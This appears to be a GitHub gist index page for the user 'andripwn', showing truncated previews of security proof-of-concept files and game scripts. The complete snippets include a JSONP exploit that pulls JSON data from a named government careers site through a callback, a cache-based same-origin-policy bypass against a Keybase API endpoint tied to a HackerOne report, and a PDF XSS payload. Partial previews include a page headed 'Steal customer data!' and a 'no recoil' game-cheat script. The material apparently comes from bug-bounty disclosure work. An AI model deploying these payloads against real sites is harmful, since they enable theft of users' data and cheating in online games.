This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import httplib, urllib, ssl, string, sys, getopt | |
| import datetime | |
| from urlparse import urlparse | |
| f = open('jetleak_' + datetime.datetime.now().strftime('%Y%m%d_%H_%M') + '.txt', 'w') | |
| ''' | |
| Author: Gotham Digital Science, modified by molejarka | |
| Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether | |
| their Jetty web server versions are vulnerable to JetLeak. Currently, this script does |
andripwn
/ subdomains.py
Created
October 24, 2019 13:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3.5 | |
| # I don't believe in license. | |
| # You can do whatever you want with this program. | |
| import os | |
| import sys | |
| import re | |
| import time | |
| import requests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function keyDown(e){Podium={};var n=document.createEvent("KeyboardEvent");Object.defineProperty(n,"keyCode",{get:function(){return this.keyCodeVal}}),n.initKeyboardEvent?n.initKeyboardEvent("keydown",!0,!0,document.defaultView,e,e,"","",!1,""):n.initKeyEvent("keydown",!0,!0,document.defaultView,!1,!1,!1,!1,e,0),n.keyCodeVal=e,document.body.dispatchEvent(n)}function keyUp(e){Podium={};var n=document.createEvent("KeyboardEvent");Object.defineProperty(n,"keyCode",{get:function(){return this.keyCodeVal}}),n.initKeyboardEvent?n.initKeyboardEvent("keyup",!0,!0,document.defaultView,e,e,"","",!1,""):n.initKeyEvent("keyup",!0,!0,document.defaultView,!1,!1,!1,!1,e,0),n.keyCodeVal=e,document.body.dispatchEvent(n)}setInterval(function(){Runner.instance_.horizon.obstacles.length>0&&(Runner.instance_.horizon.obstacles[0].xPos<25*Runner.instance_.currentSpeed-Runner.instance_.horizon.obstacles[0].width/2&&Runner.instance_.horizon.obstacles[0].yPos>75&&(keyUp(40),keyDown(38)),Runner.instance_.horizon.obstacles[0].xPos<30*Run |
andripwn
/ ExploitJson.html
Created
November 21, 2019 12:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function rip(a) { | |
| alert(JSON.stringify(a[1])); | |
| } | |
| </script> | |
| <script src="http://careers.lta.gov.sg/cw/en/jobs.json?callback=rip"></script> |
andripwn
/ V5NoRecoil.lua
Last active
August 21, 2023 17:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ---------------- V5 ------------------------------ | |
| ---Updated on 7/19/19 | |
| ----Tutorial Videos------------------------------------------------ | |
| -----How to use: https://www.youtube.com/watch?v=F_tvWzF3x18 | |
| -----Youtube Channel: https://www.youtube.com/c/Kriptutorial |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <body> | |
| <center> | |
| <h3>Steal customer data!</h3> | |
| <div id="demo"> | |
| </div> | |
| <script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $values = array( | |
| 'uid' => $uid, | |
| 'user_login' => $user_login, | |
| 'user_role' => $user_role, | |
| 'time' => current_time('mysql'), | |
| 'ip' => isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? esc_attr($_SERVER['HTTP_X_FORWARDED_FOR']) : esc_attr($_SERVER['REMOTE_ADDR']), | |
| 'login_result' => $this->login_success, | |
| 'data' => $serialized_data, | |
| ); | |
andripwn
/ forcecache.html
Created
December 25, 2019 17:35
SOP bypass using browser cache (https://hackerone.com/reports/761726)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}"; | |
| fetch(url, { | |
| method: 'GET', | |
| cache: 'force-cache' | |
| }); | |
| </script> | |
| </html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1 | |
| 11 /* | |
| 12 * Portions based on TCL source code which is: | |
| 13 * | |
| 14 * Copyright (c) 1987-1994 The Regents of the University of California. | |
| 15 * Copyright (c) 1994-1997 Sun Microsystems, Inc. | |
| 16 * Copyright (c) 1993-1996 Lucent Technologies. | |
| 17 * | |
| 18 */ | |
| 19 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| app.alert("XSS") |